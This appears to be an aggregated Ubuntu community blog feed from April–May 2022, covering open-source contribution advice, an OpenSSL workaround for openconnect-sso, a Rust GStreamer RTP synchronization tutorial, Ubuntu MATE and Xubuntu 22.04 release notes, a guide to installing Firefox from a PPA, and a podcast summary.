Launchpad and Bazaar instead of GitLab and git – down the memory lane! My journey with Ubuntu started by correcting a typo in a README, and here I am, years later, having contributed to dozens of projects and having a career in the C.S. field. Back then, I really had no idea what my future would hold.

For GitLab, you can take a look at the issues marked as “good for new contributors”. They are designed to be addressed quickly, and onboard new people in the community. In this way, you don’t have to focus on the difficulties of the task at hand, but you can easily explore how the community works.

Writing issues is a good start

Writing high-quality issues is a great way to start contributing: maintainers of a project are not always aware of how the software is used, and cannot be aware of all the issues. If you know that something could be improved, write it down: spend some time explaining what happens, what you expect, and how to reproduce the problem, and maybe suggest some solutions as well! Perhaps the first issue you write down could be the very first issue you resolve.

Not much time required!

Contributing to a project doesn't necessarily require a lot of time. When I was younger, I definitely dedicated way more time to open-source projects, implementing gigantic features. Nowadays, I don't do that anymore (life is much more than computers), but I like to think that my contributions are still useful. Still, I don't spend more than a couple of hours a month, based on my schedule and how much it rains (yep, in winter I definitely contribute more than in summer).

GitLab is super easy

Do you use GitLab? Then you should undoubtedly try to contribute to it. It is easy, it is fun, and there are many ways. Take a look at this guide, hang out on Gitter, and see you around. ;-)

Next week (9th-13th May 2022) there is also a GitLab Hackathon! It is a really fun and easy way to start contributing: many people are available to help you, there are video sessions talking about contributing, and just by making a small contribution you will receive a pretty prize.

And if I was able to do it with my few contributions, you can as well! And in time, if you are consistent in your contributions, you can become a GitLab Hero! How cool is that?

I really hope this wall of text made you consider contributing to an open-source project. If you have any questions or feedback, or if you would like some help, please leave a comment below, tweet me @rpadovani93 or write me an email at hello@rpadovani.com.


on May 04, 2022 12:00 AM

May 02, 2022

Sorry, I should have posted this weeks ago to save others some time.

If you are running openconnect-sso to connect to a Cisco anyconnect VPN, then when you upgrade to Ubuntu Jammy, openssl 3.0 may stop openconnect from working. The easiest way to work around this is to use a custom configuration file as follows:

cat > $HOME/ssl.cnf << 'EOF'
openssl_conf = openssl_init

[openssl_init]
ssl_conf = ssl_sect

[ssl_sect]
system_default = system_default_sect

[system_default_sect]
Options = UnsafeLegacyRenegotiation
EOF

Then use this configuration file (only) when running openconnect:

OPENSSL_CONF=~/ssl.cnf openconnect-sso --server=your-server.whatever.com

on May 02, 2022 02:39 PM

Over the last few weeks, GStreamer’s RTP stack got a couple of new and quite useful features. As it is difficult to configure, mostly because there are so many different possible configurations, I decided to write about this a bit with some example code.

The features are RFC 6051-style rapid synchronization of RTP streams, which can be used for inter-stream (e.g. audio/video) synchronization as well as inter-device (i.e. network) synchronization, and the ability to easily retrieve absolute sender clock times per packet on the receiver side.

Note that each of these was already possible before with GStreamer via different mechanisms with different trade-offs. Obviously, not having working audio/video synchronization would simply not be acceptable, and I have previously talked about how to do inter-device synchronization with GStreamer, for example at the GStreamer Conference 2015 in Düsseldorf.

The example code below will make use of the GStreamer RTSP Server library but can be applied to any kind of RTP workflow, including WebRTC. It is written in Rust, but the same can also be achieved in any other language. The full code can be found in this repository.

And for reference, the merge requests to enable all this are [1], [2] and [3]. You probably don’t want to backport those to an older version of GStreamer though as there are dependencies on various other changes elsewhere. All of the following needs at least GStreamer from the git main branch as of today, or the upcoming 1.22 release.

Baseline Sender / Receiver Code

The starting point of the example code can be found here in the baseline branch. All the important steps are commented so it should be relatively self-explanatory.


The sender is starting an RTSP server on the local machine on port 8554 and provides a media with H264 video and Opus audio on the mount point /test. It can be started with

$ cargo run -p rtp-rapid-sync-example-send

After starting the server it can be accessed via GStreamer with e.g. gst-play-1.0 rtsp:// or similarly via VLC or any other software that supports RTSP.

This does not do anything special yet but lays the foundation for the following steps. It creates an RTSP server instance with a custom RTSP media factory, which in turn creates custom RTSP media instances. All this is not needed at this point yet but will allow for the necessary customization later.

One important aspect here is that the base time of the media’s pipeline is set to zero
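A minimal sketch of what that looks like (assuming the gstreamer-rs element API; the exact lines are in the linked repository):

// Make running time equal to clock time: zero the base time and
// stop the pipeline from distributing a new one on state changes.
pipeline.set_base_time(gst::ClockTime::ZERO);
pipeline.set_start_time(gst::ClockTime::NONE);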


This allows the timeoverlay element that is placed in the video part of the pipeline to render the clock time over the video frames. We’re going to use this later to confirm on the receiver that the clock time on the sender and the one retrieved on the receiver are the same.

let video_overlay = gst::ElementFactory::make("timeoverlay", None)
    .context("Creating timeoverlay")?;
video_overlay.set_property_from_str("time-mode", "running-time");

It actually only supports rendering the running time of each buffer, but in a live pipeline with the base time set to zero the running time and pipeline clock time are the same. See the documentation for some more details about the time concepts in GStreamer.

Overall this creates the following RTSP stream producer bin, which will be used also in all the following steps:


The receiver is a simple playbin pipeline that plays an RTSP URI given via command-line parameters and runs until the stream is finished or an error has happened.

It can be run with the following once the sender is started

$ cargo run -p rtp-rapid-sync-example-receive -- "rtsp://"

Please don’t forget to replace the IP with the IP of the machine that is actually running the server.

All the code should be familiar to anyone who ever wrote a GStreamer application in Rust, except for one part that might need a bit more explanation

    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
    })

playbin is going to create an rtspsrc, and at that point it will emit the source-setup signal so that the application can do any additional configuration of the source element. Here we’re connecting a signal handler to that signal to do exactly that.
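For reference, a sketch of how that handler might be wired up (assuming the connect_closure API from the glib/gstreamer-rs bindings used throughout this post):

playbin.connect_closure(
    "source-setup",
    false,
    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        // 40ms latency instead of rtspsrc's 2s default; see the note below.
        source.set_property("latency", 40u32);
    }),
);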

By default rtspsrc introduces 2 seconds of latency, which is a lot more than what is usually needed. For live, non-VOD RTSP streams this value should be around the network jitter, and here we’re configuring it to 40 milliseconds.

Retrieval of absolute sender clock times

Now as the first step we’re going to retrieve the absolute sender clock times for each video frame on the receiver. They will be rendered by the receiver at the bottom of each video frame and will also be printed to stdout. The changes between the previous version of the code and this version can be seen here and the final code here in the sender-clock-time-retrieval branch.

When running the sender and receiver as before, the video from the receiver should look similar to the following

The upper time that is rendered on the video frames is rendered by the sender, the bottom time is rendered by the receiver and both should always be the same unless something is broken here. Both times are the pipeline clock time when the sender created/captured the video frame.

In this configuration the absolute clock times of the sender are provided to the receiver via the NTP / RTP timestamp mapping provided by the RTCP Sender Reports. That’s also the reason why it takes about 5s for the receiver to know the sender’s clock time: RTCP packets are not scheduled very often, by default only about every 5s. The RTCP interval can be configured on rtpbin together with many other things.


On the sender-side the configuration changes are rather small and not even absolutely necessary.

rtpbin.set_property_from_str("ntp-time-source", "clock-time");

By default the RTP NTP time used in the RTCP packets is based on the local machine’s walltime clock converted to the NTP epoch. While this works fine, this is not the clock that is used for synchronizing the media and as such there will be drift between the RTP timestamps of the media and the NTP time from the RTCP packets, which will be reset every time the receiver receives a new RTCP Sender Report from the sender.

Instead, we configure rtpbin here to use the pipeline clock as the source for the NTP timestamps used in the RTCP Sender Reports. This doesn’t give us (by default at least, see later) an actual NTP timestamp but it doesn’t have the drift problem mentioned before. Without further configuration, in this pipeline the used clock is the monotonic system clock.

rtpbin.set_property("rtcp-sync-send-time", false);

rtpbin normally uses the time when a packet is sent out for the NTP / RTP timestamp mapping in the RTCP Sender Reports. This is changed with this property to instead use the time when the video frame / audio sample was captured, i.e. it does not include all the latency introduced by encoding and other processing in the sender pipeline.

This doesn’t make any big difference in this scenario but usually one would be interested in the capture clock times and not the send clock times.


On the receiver-side there are a few more changes. First of all we have to opt-in to rtpjitterbuffer putting a reference timestamp metadata on every received packet with the sender’s absolute clock time.

    glib::closure!(|_playbin: &gst::Pipeline, source: &gst::Element| {
        source.set_property("latency", 40u32);
        source.set_property("add-reference-timestamp-meta", true);
    })

rtpjitterbuffer will start putting the metadata on packets once it knows the NTP / RTP timestamp mapping, i.e. after the first RTCP Sender Report is received in this case. Between the Sender Reports it is going to interpolate the clock times. The normal timestamps (PTS) on each packet are not affected by this and are still based on whatever clock is used locally by the receiver for synchronization.

To actually make use of the reference timestamp metadata we add a timeoverlay element as video-filter on the receiver:

let timeoverlay =
    gst::ElementFactory::make("timeoverlay", None).context("Creating timeoverlay")?;

timeoverlay.set_property_from_str("time-mode", "reference-timestamp");
timeoverlay.set_property_from_str("valignment", "bottom");

pipeline.set_property("video-filter", &timeoverlay);

This will then render the sender’s absolute clock times at the bottom of each video frame, as seen in the screenshot above.

And last we also add a pad probe on the sink pad of the timeoverlay element to retrieve the reference timestamp metadata of each video frame and then printing the sender’s clock time to stdout:

// Probe buffers on the timeoverlay's sink pad and read their ReferenceTimestampMeta.
let sinkpad = timeoverlay
    .static_pad("video_sink")
    .expect("Failed to get timeoverlay sinkpad");
sinkpad
    .add_probe(gst::PadProbeType::BUFFER, |_pad, info| {
        if let Some(gst::PadProbeData::Buffer(ref buffer)) = info.data {
            if let Some(meta) = buffer.meta::<gst::ReferenceTimestampMeta>() {
                println!("Have sender clock time {}", meta.timestamp());
            } else {
                println!("Have no sender clock time");
            }
        }
        gst::PadProbeReturn::Ok
    })
    .expect("Failed to add pad probe");

Rapid synchronization via RTP header extensions

The main problem with the previous code is that the sender’s clock times are only known once the first RTCP Sender Report is received by the receiver. There are many ways to configure rtpbin to make this happen faster (e.g. by reducing the RTCP interval or by switching to the AVPF RTP profile) but in any case the information would be transmitted outside the actual media data flow and it can’t be guaranteed that it is actually known on the receiver from the very first received packet onwards. This is of course not a problem in every use-case, but for the cases where it is there is a solution for this problem.

RFC 6051 defines an RTP header extension that allows transmitting the NTP timestamp corresponding to an RTP packet directly together with that very packet. And that’s what the next changes to the code are making use of.

The changes between the previous version of the code and this version can be seen here and the final code here in the rapid-synchronization branch.


To add the header extension on the sender-side it is only necessary to add an instance of the corresponding header extension implementation to the payloaders.

let hdr_ext = gst_rtp::RTPHeaderExtension::create_from_uri(
    "urn:ietf:params:rtp-hdrext:ntp-64", // the RFC 6051 64-bit NTP timestamp extension
)
.context("Creating NTP 64-bit RTP header extension")?;
hdr_ext.set_id(1); // see RFC 5285
video_pay.emit_by_name::<()>("add-extension", &[&hdr_ext]);

This first instantiates the header extension based on the uniquely defined URI for it, then sets its ID to 1 (see RFC 5285) and then adds it to the video payloader. The same is then done for the audio payloader.

By default this will add the header extension to every RTP packet that has a different RTP timestamp than the previous one. In other words: on the first packet that corresponds to an audio or video frame. Via properties on the header extension this can be configured but generally the default should be sufficient.


On the receiver-side no changes would actually be necessary. The use of the header extension is signaled via the SDP (see RFC 5285) and it will be automatically made use of inside rtpbin as another source of NTP / RTP timestamp mappings in addition to the RTCP Sender Reports.

However, we configure one additional property on rtpbin

    glib::closure!(|_rtspsrc: &gst::Element, rtpbin: &gst::Element| {
        rtpbin.set_property("min-ts-offset", gst::ClockTime::from_mseconds(1));
    })

Inter-stream audio/video synchronization

The reason for configuring the min-ts-offset property on the rtpbin is that the NTP / RTP timestamp mapping is not only used for providing the reference timestamp metadata but it is also used for inter-stream synchronization by default. That is, for getting correct audio / video synchronization.

With RTP alone there is no mechanism to synchronize multiple streams against each other as the packet’s RTP timestamps of different streams have no correlation to each other. This is not too much of a problem as usually the packets for audio and video are received approximately at the same time but there’s still some inaccuracy in there.

One approach to fix this is to use the NTP / RTP timestamp mapping for each stream, either from the RTCP Sender Reports or from the RTP header extension, and that’s what is made use of here. And because the mapping is provided very often via the RTP header extension but the RTP timestamps are only accurate up to the clock rate (1/90000s for video and 1/48000s for audio in this case), we configure a threshold of 1ms for adjusting the inter-stream synchronization. Without this it would be adjusted almost continuously by a very small amount back and forth.

Other approaches for inter-stream synchronization are provided by RTSP itself before streaming starts (via the RTP-Info header), but due to a bug this is currently not made use of by GStreamer.

Yet another approach would be via the clock information provided by RFC 7273, about which I already wrote previously and which is also supported by GStreamer. This also allows inter-device, network synchronization and is used for that purpose as part of e.g. AES67, Ravenna, SMPTE 2022 / 2110 and many other protocols.

Inter-device network synchronization

Now for the last part, we’re going to add actual inter-device synchronization to this example. The changes between the previous version of the code and this version can be seen here and the final code here in the network-sync branch. This does not use the clock information provided via RFC 7273 (which would be another option) but uses the same NTP / RTP timestamp mapping that was discussed above.

When starting the receiver multiple times on different (or the same) machines, each of them should play back the media synchronized to each other and exactly 2 seconds after the corresponding audio / video frames are produced on the sender.

For this, both the sender and all receivers are using an NTP clock (pool.ntp.org in this case) instead of the local monotonic system clock for media synchronization (i.e. as the pipeline clock). Instead of an NTP clock it would also be possible to use any other mechanism for network clock synchronization, e.g. PTP or the GStreamer netclock.

println!("Syncing to NTP clock");
// Sketch, assuming the gstreamer-net bindings: an NTP clock against pool.ntp.org, waiting up to 5s.
let clock = gst_net::NtpClock::new(None, "pool.ntp.org", 123, gst::ClockTime::ZERO);
clock.wait_for_sync(Some(gst::ClockTime::from_seconds(5))).context("Syncing NTP clock")?;
println!("Synced to NTP clock");

This code instantiates a GStreamer NTP clock and then synchronously waits up to 5 seconds for it to synchronize. If that fails then the application simply exits with an error.


On the sender side all that is needed is to configure the RTSP media factory, and as such the pipeline used inside it, to use the NTP clock
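The call itself is presumably a one-liner on the factory (a sketch, assuming the gst-rtsp-server bindings):

// Every media created by this factory will use the synced NTP clock.
factory.set_clock(Some(&clock));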


This causes all media inside the sender’s pipeline to be synchronized according to this NTP clock and to also use it for the NTP timestamps in the RTCP Sender Reports and the RTP header extension.


On the receiver side the same has to happen
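Again likely a one-liner (a sketch, assuming the playbin pipeline from earlier):

// Force the receiver's pipeline to use the same NTP clock as the sender.
pipeline.use_clock(Some(&clock));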


In addition a couple more settings have to be configured on the receiver though. First of all we configure a static latency of 2 seconds on the receiver’s pipeline.
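A sketch of that configuration (assuming the gstreamer-rs pipeline API):

// Compensate for sender, network and receiver latency with a fixed offset.
pipeline.set_latency(gst::ClockTime::from_seconds(2));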


This is necessary as GStreamer can’t know the latency of every receiver (e.g. different decoders might be used), and also because the sender latency can’t be automatically known. Each audio / video frame will be timestamped on the receiver with the NTP timestamp when it was captured / created, but since then all the latency of the sender, the network and the receiver pipeline has passed and for this some compensation must happen.

Which value to use here depends a lot on the overall setup, but 2 seconds is a (very) safe guess in this case. The value only has to be larger than the sum of sender, network and receiver latency and in the end has the effect that the receiver is showing the media exactly that much later than the sender has produced it.

And last we also have to tell rtpbin that

  1. sender and receiver clock are synchronized to each other, i.e. in this case both are using exactly the same NTP clock, and that no translation to the pipeline’s clock is necessary, and
  2. that the outgoing timestamps on the receiver should be exactly the sender timestamps and that this conversion should happen based on the NTP / RTP timestamp mapping

source.set_property_from_str("buffer-mode", "synced");
source.set_property("ntp-sync", true);

And that’s it.

A careful reader will also have noticed that all of the above would also work without the RTP header extension, but then the receivers would only be synchronized once the first RTCP Sender Report is received. That’s what the test-netclock.c / test-netclock-client.c example from the GStreamer RTSP server is doing.

As usual with RTP, the above is by far not the only way of doing this and GStreamer also supports various other synchronization mechanisms. Which one is the correct one for a specific use-case depends on a lot of factors.

on May 02, 2022 01:00 PM

April 26, 2022

Ubuntu MATE 22.04 LTS is the culmination of 2 years of continual improvement 😅 to Ubuntu and MATE Desktop. As is tradition, the LTS development cycle has a keen focus on eliminating paper 🧻 cuts 🔪 but we’ve jammed in some new features and a fresh coat of paint too 🖌 The following is a summary of what’s new since Ubuntu MATE 21.10 and some reminders of how we got here from 20.04. Read on to learn more 🧑‍🎓

Thank you! 🙇

I’d like to extend my sincere thanks to everyone who has played an active role in improving Ubuntu MATE for this LTS release 👏 From reporting bugs, submitting translations, providing patches, contributing to our crowd funding, developing new features, creating artwork, offering community support, actively testing and providing QA feedback to writing documentation or creating this fabulous website. Thank you! Thank you all for getting out there and making a difference! 💚

Ubuntu MATE 22.04 LTS Ubuntu MATE 22.04 LTS (Jammy Jellyfish) - Mutiny layout with Yark-MATE-dark

What’s changed?

Here are the highlights of what’s changed recently.

MATE Desktop 1.26.1 🧉

Ubuntu MATE 22.04 features MATE Desktop 1.26.1. MATE Desktop 1.26.0 was introduced in 21.10 and benefits from significant effort 😅 in fixing bugs 🐛 in MATE Desktop, optimising performance ⚡ and plugging memory leaks. MATE Desktop 1.26.1 addresses the bugs we discovered following the initial 1.26.0 release. Our community also fixed some bugs in Plank and Brisk Menu 👍 and fixed the screen reader during installs for visually impaired users 🥰 In all, over 500 bugs have been addressed in this release 🩹

Yaru 🎨

Ubuntu MATE 21.04 was the first release to ship with a MATE variant of the Yaru theme. A year later and we’ve been working hard with members of the Yaru and Ubuntu Desktop teams to bring full MATE compatibility to upstream Yaru, including all the accent colour varieties. All reported bugs 🐞 in the Yaru implementation for MATE have also been fixed 🛠

Yaru Themes Yaru Themes in Ubuntu MATE 22.04 LTS

Ubuntu MATE 22.04 LTS ships with all the Yaru themes, including our own “chelsea cucumber” version 🥒 The legacy Ambiant/Radiant themes are no longer installed by default and neither are the stock MATE Desktop themes. We’ve added an automatic settings migration to transition users who upgrade to an appropriate Yaru MATE theme.

Cherries on top 🍒

In collaboration with Paul Kepinski 🇫🇷 (Yaru team) and Marco Trevisan 🇮🇹 (Ubuntu Desktop team) we’ve added dark/light panels and panel icons to Yaru for MATE Desktop and Unity. I’ve added a collection of new dark/light panel icons to Yaru for popular apps with indicators such as Steam, Dropbox, uLauncher, RedShift, Transmission, Variety, etc.

Light Panel Dark Panel Light and Dark panels

I’ve added patches 🩹 to the Appearance Control Center that apply theme changes to Plank (the dock) and Pluma (text editor), and correctly toggle the colour scheme preference for GNOME 42 apps. When you choose a dark theme, everything will go dark in unison 🥷 and vice versa.

So, Ubuntu MATE 22.04 LTS is now using everything Yaru/Suru has to offer. 🎉

AI Generated wallpapers

My friend Simon Butcher 🇬🇧 is Head of Research Platforms at Queen Mary University of London, managing the Apocrita HPC cluster service. He’s been creating AI 🤖 generated art using bleeding edge CLIP guided diffusion models 🖌 The results are pretty incredible and we’ve included the 3 top-voted “Jammy Jellyfish” wallpapers in our selection, as their vivid and vibrant styles complement the Yaru accent colour theme options very nicely indeed 😎

If you want the complete set, here’s a tarball of all 8 wallpapers at 3840x2160:

Ubuntu MATE stuff 🧉

Ubuntu MATE has a few distinctive apps and integrations of its own; here’s a rundown of what’s new and shiny ✨

MATE Tweak

Switching layouts with MATE Tweak is its most celebrated feature. We’ve improved the reliability of desktop layout switching and restoring custom layouts is now 100% accurate 💯

Ubuntu MATE Desktop Layouts Having your desktop your way in Ubuntu MATE

We’ve removed mate-netbook from the default installation of Ubuntu MATE and as a result the Netbook layout is no longer available. We did this because mate-maximus, a component of mate-netbook, is the cause of some compatibility issues with client side decorated (CSD) windows. There are still several panel layouts that offer efficient resolution use 📐 for those who need it.

MATE Tweak has refreshed its support for 3rd party compositors. Support for Compton has been dropped, as it is no longer actively maintained, and comprehensive support for picom has been added. picom has three compositor options: Xrender, GLX and Hybrid. All three can be selected via MATE Tweak, as the performance and compatibility of each varies depending on your hardware. Some people choose to use picom because they get better gaming performance or reduced screen tearing. Some just like the subtle animation effects picom adds 💖


Recent versions of rofi, the tool used by MATE HUD to visualise menu searches, has a new theme system. MATE HUD has been updated to support this new theme engine and comes with two MATE specific themes (mate-hud and mate-hud-rounded) that automatically adapt to match the currently selected GTK theme.

You can add your own rofi themes to ~/.local/share/rofi/themes. Should you want to, you can use any rofi theme in MATE HUD. Use Alt + F2 to run rofi-theme-selector to try out the different themes, and if there is one you prefer you can set it as default by running the following in a terminal:

gsettings set org.mate.hud rofi-theme <theme name>

MATE HUD MATE HUD uses the new rofi theme engine

Windows & Shadows

I’ve updated the Metacity/Marco (the MATE Window Manager) themes in Yaru to make sure they match GNOME/CSD/Handy windows for a consistent look and feel across all window types 🪟 and 3rd party compositors like picom. I even patched how Marco and picom render shadows so that windows look cohesive regardless of the toolkit or compositor being used.

Ubuntu MATE Welcome & Boutique

The Software Boutique has been restocked with software for 22.04 and Firefox 🔥🦊 ESR (.deb) has been added to the Browser Ballot in Ubuntu MATE Welcome.

Ubuntu MATE Welcome Browser Ballot Comprehensive browser options just a click away

41% less fat 🍩

Ubuntu MATE, like its lead developer, was starting to get a bit large around the mid section 😊 During the development of 22.04, the image 📀 got to 4.1GB 😮

So, we put Ubuntu MATE on a strict diet 🥗 We’ve removed the proprietary NVIDIA drivers from the local apt pool on the install media, migrated fully to Yaru (which now features excellent de-duplication of icons) and removed our legacy themes/icons. And now that the Yaru-MATE themes/icons are completely in upstream Yaru, we were able to remove 3 snaps from the default install. The image is now a much more reasonable 2.7GB; 41% smaller 🗜

This is important to us, because the majority of our users are in countries where Internet bandwidth is not always plentiful. Those of you with NVIDIA GPUs, don’t worry. If you tick the 3rd party software and drivers during the install the appropriate driver for your GPU will be downloaded and installed 👍

Install 3rd party drivers NVIDIA GPU owners should tick Install 3rd party software and drivers during install

While investigating 🕵 a bug in Xorg Server that caused Marco (the MATE window manager) to crash, we discovered that Marco has lower frame time latency ⏱ when using Xrender with the NVIDIA proprietary drivers. We’ve published a PPA where NVIDIA GPU users can install a version of Marco that uses Xpresent for optimal performance:

sudo apt-add-repository ppa:ubuntu-mate-dev/marco
sudo apt upgrade

Should you want to revert this change, install ppa-purge and run the following from a terminal: sudo ppa-purge -o ubuntu-mate-dev -p marco.

But wait! There’s more! 😲

These reductions in size came even after we added three new applications to the default install of Ubuntu MATE: GNOME Clocks, Maps and Weather. My family and I 👨‍👩‍👧 have found these applications particularly useful and use them regularly on our laptops without having to reach for a phone or tablet.

GNOME Clocks, Maps & Weather New additions to the default desktop application in Ubuntu MATE 22.04 LTS

For those of you who like a minimal base platform, then the minimal install option is still available which delivers just the essential Ubuntu MATE Desktop and Firefox browser. You can then build up from there 👷

Packages, packages, packages 📦

It doesn’t matter how you like to consume your Linux 🐧 packages: Ubuntu MATE has got you covered with PPA, Snap, AppImage and Flatpak support baked in by default. You’ll find flatpak, snapd and xdg-desktop-portal-gtk (to support Snap and Flatpak) and the (ageing) libfuse2 (to support AppImage) all pre-installed.

Although flatpak is installed, FlatHub is not enabled by default. To enable FlatHub run the following in a terminal:

flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo

We’ve also included snapd-desktop-integration which provides a bridge between the user’s session and snapd to integrate theme preferences 🎨 with snapped apps and can also automatically install snapped themes 👔 All the Yaru themes shipped in Ubuntu MATE are fully snap aware.

Ayatana Indicators

Ubuntu MATE 20.10 transitioned to Ayatana Indicators 🚥 As a quick refresher, Ayatana Indicators are a fork of Ubuntu Indicators that aim to be cross-distro compatible and re-usable for any desktop environment 👌

Ubuntu MATE 22.04 LTS comes with Ayatana Indicators 22.2.0 and sees the return of Messages Indicator 📬 to the default install. Ayatana Indicators now provide improved backwards compatibility to Ubuntu Indicators and no longer requires the installation of two sets of libraries, saving RAM, CPU cycles and improving battery endurance 🔋

Ayatana Indicator Settings Ayatana Indicators Settings

To complement the BlueZ 5.64 protocol stack in Ubuntu, Ubuntu MATE ships Blueman 2.2.4, which offers comprehensive management of Bluetooth devices and much improved pairing compatibility 💙🦷

I also patched mate-power-manager, ayatana-indicator-power and Yaru to add support for battery powered gaming input devices, such as controllers 🎮 and joysticks 🕹

Active Directory

And in case you missed it, the Ubuntu Desktop team added the option to enroll your computer into an Active Directory domain 🔑 during install. Ubuntu MATE has supported the same capability since it was first made available in the 20.10 release.

Raspberry Pi image 🥧

  • Should be available very shortly after the release of 22.04.

Major Applications

Accompanying MATE Desktop 1.26.1 and Linux 5.15 are Firefox 99.0, Celluloid 0.20, Evolution 3.44 & LibreOffice

See the Ubuntu 22.04 Release Notes for details of all the changes and improvements that Ubuntu MATE benefits from.

Download Ubuntu MATE 22.04 LTS

This new release will be first available for PC/Mac users.


Upgrading from Ubuntu MATE 20.04 LTS and 21.10

You can upgrade to Ubuntu MATE 22.04 LTS from either Ubuntu MATE 20.04 LTS or 21.10. Ensure that you have all updates installed for your current version of Ubuntu MATE before you upgrade.

  • Open the “Software & Updates” from the Control Center.
  • Select the 3rd Tab called “Updates”.
  • Set the “Notify me of a new Ubuntu version” drop down menu to “For long-term support versions” if you are using 20.04 LTS; set it to “For any new version” if you are using 21.10.
  • Press Alt+F2 and type in update-manager -c -d into the command box.
  • Update Manager should open up and tell you: New distribution release ‘XX.XX’ is available.
    • If not, you can use /usr/lib/ubuntu-release-upgrader/check-new-release-gtk
  • Click “Upgrade” and follow the on-screen instructions.

There are no offline upgrade options for Ubuntu MATE. Please ensure you have network connectivity to one of the official mirrors or to a locally accessible mirror and follow the instructions above.

Known Issues

Here are the known issues.

  • Ubiquity slide shows are missing for OEM installs of Ubuntu MATE (component: Ubuntu).


Is there anything you can help with or want to be involved in? Maybe you just want to discuss your experiences or ask the maintainers some questions. Please come and talk to us.

on April 26, 2022 04:47 PM

April 23, 2022

It is now widely known that Ubuntu 22.04 LTS (Jammy Jellyfish) ships Firefox as a snap, but some people (like me) may prefer installing it from .deb packages to retain control over upgrades or to keep extensions working.

Luckily there is still a PPA serving firefox (and thunderbird) debs at https://launchpad.net/~mozillateam/+archive/ubuntu/ppa maintained by the Mozilla Team. (Thank you!)

You can block the Ubuntu archive’s version that just pulls in the snap by pinning it:

$ cat /etc/apt/preferences.d/firefox-no-snap 
Package: firefox*
Pin: release o=Ubuntu*
Pin-Priority: -1
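
With the pin in place, you can sanity-check that the Ubuntu archive version is now blocked; in the output, the archive candidate should be listed with priority -1 (exact output varies by mirror):

$ apt policy firefox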

Now you can remove the transitional package and the Firefox snap itself:

sudo apt purge firefox
sudo snap remove firefox
sudo add-apt-repository ppa:mozillateam/ppa
sudo apt update
sudo apt install firefox

Since the package comes from a PPA, unattended-upgrades will not upgrade it automatically unless you enable this origin:

echo 'Unattended-Upgrade::Allowed-Origins:: "LP-PPA-mozillateam:${distro_codename}";' | sudo tee /etc/apt/apt.conf.d/51unattended-upgrades-firefox
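
To confirm the origin is picked up without waiting for the next scheduled run, a dry run works (simulation only, nothing is installed):

sudo unattended-upgrade --dry-run --debug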

Happy browsing!

Update: I have found a few other, similar guides at https://fostips.com/ubuntu-21-10-two-firefox-remove-snap and https://ubuntuhandbook.org/index.php/2022/04/install-firefox-deb-ubuntu-22-04 and I’ve updated the pinning configuration based on them.

on April 23, 2022 02:38 PM

April 21, 2022

The Xubuntu team is happy to announce the immediate release of Xubuntu 22.04.

Xubuntu 22.04, codenamed Jammy Jellyfish, is a long-term support (LTS) release and will be supported for 3 years, until 2025.

The Xubuntu and Xfce development teams have made great strides in usability, expanded features, and additional applications in the last two years. Users coming from 20.04 will be delighted with improvements found in Xfce 4.16 and our expanded application set. 21.10 users will appreciate the added stability that comes from the numerous maintenance releases that landed this cycle.

The final release images are available as torrents and direct downloads from xubuntu.org/download/.

As the main server might be busy in the first few days after the release, we recommend using the torrents if possible.

Xubuntu Core, our minimal ISO edition, is available to download from unit193.net/xubuntu/core/ [torrent]. Find out more about Xubuntu Core here.

We’d like to thank everybody who contributed to this release of Xubuntu!

Highlights and Known Issues


  • Mousepad 0.5.8, our text editor, broadens its feature set with the addition of session backup and restore, plugin support, and a new gspell plugin.
  • Ristretto 0.12.2, the versatile image viewer, improves thumbnail support and features numerous performance improvements.
  • Whisker Menu Plugin 2.7.1 expands customization options with several new preferences and CSS classes for theme developers.
  • Firefox is now included as a Snap package.
  • Refreshed user documentation, available on the ISO and online.
  • Six new wallpapers from the 22.04 Community Wallpaper Contest.

Known Issues

  • The shutdown prompt may not be displayed at the end of the installation. Instead you might just see a Xubuntu logo, a black screen with an underscore in the upper left hand corner, or just a black screen. Press Enter and the system will reboot into the installed environment. (LP: #1944519)
  • The Firefox Snap is not currently able to open the locally-installed Xubuntu Docs. (LP: #1967109)

For more obscure known issues, information on affecting bugs, bug fixes, and a list of new package versions, please refer to the Xubuntu Release Notes.

The main Ubuntu Release Notes cover many of the other packages we carry and more generic issues.


For support with the release, navigate to Help & Support for a complete list of methods to get help.

on April 21, 2022 10:44 PM

The Xubuntu team is happy to announce the results of the 22.04 community wallpaper contest!

As always, we’d like to send out a huge thanks to every contestant. The Xubuntu Community Wallpaper Contest gives us a unique chance to interact with the community and get contributions from members who may otherwise not have had the opportunity to join in before. With around 130 submissions, the contest garnered less interest this time around, but we still had a lot of great work to pick from. All of the submissions are browsable on the 22.04 contest page at contest.xubuntu.org.

Without further ado, here are the winners:

From left to right, top to bottom. Click on the links for full-size image versions.

Congratulations, and thanks for your wonderful contributions!

on April 21, 2022 10:21 PM

E191 Podcast Wacom Portugal

Podcast Ubuntu Portugal

Dali (read: Diogo) went shopping, for a change, aiming to equip himself with creative tools. Carrondo, square as ever, saw a more technical angle in that act. A week in which Vodafone is back in the conversation, and so are migrations, this time from WordPress to Hugo, or plain HTML…
You know the drill: listen, subscribe and share!

* https://gitlab.com/podcastubuntuportugal
* https://gitlab.com/podcastubuntuportugal/website
* https://gitlab.com/podcastubuntuportugal/magia
* https://wordpress.org/plugins/simply-static/
* https://downdetector.pt/
* https://shop.nitrokey.com/shop/product/nk-pro-2-nitrokey-pro-2-3?aff_ref=3
* https://shop.nitrokey.com/shop?aff_ref=3
* https://youtube.com/PodcastUbuntuPortugal

### Support
You can support the podcast using the Humble Bundle affiliate links; when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal.
You can get all of this for 15 dollars, or different parts of it depending on whether you pay 1 or 8.
We think this is worth well over 15 dollars, so if you can, pay a little more, since you have the option to pay as much as you like.
If you are interested in other bundles not listed in the show notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.

### Attribution and licenses
This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by [Senhor Podcast](https://senhorpodcast.pt/).
The website is produced by Tiago Carrondo and the [open source code](https://gitlab.com/podcastubuntuportugal/website) is licensed under the [MIT License](https://gitlab.com/podcastubuntuportugal/website/main/LICENSE).
The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the [CC0 1.0 Universal License](https://creativecommons.org/publicdomain/zero/1.0/).
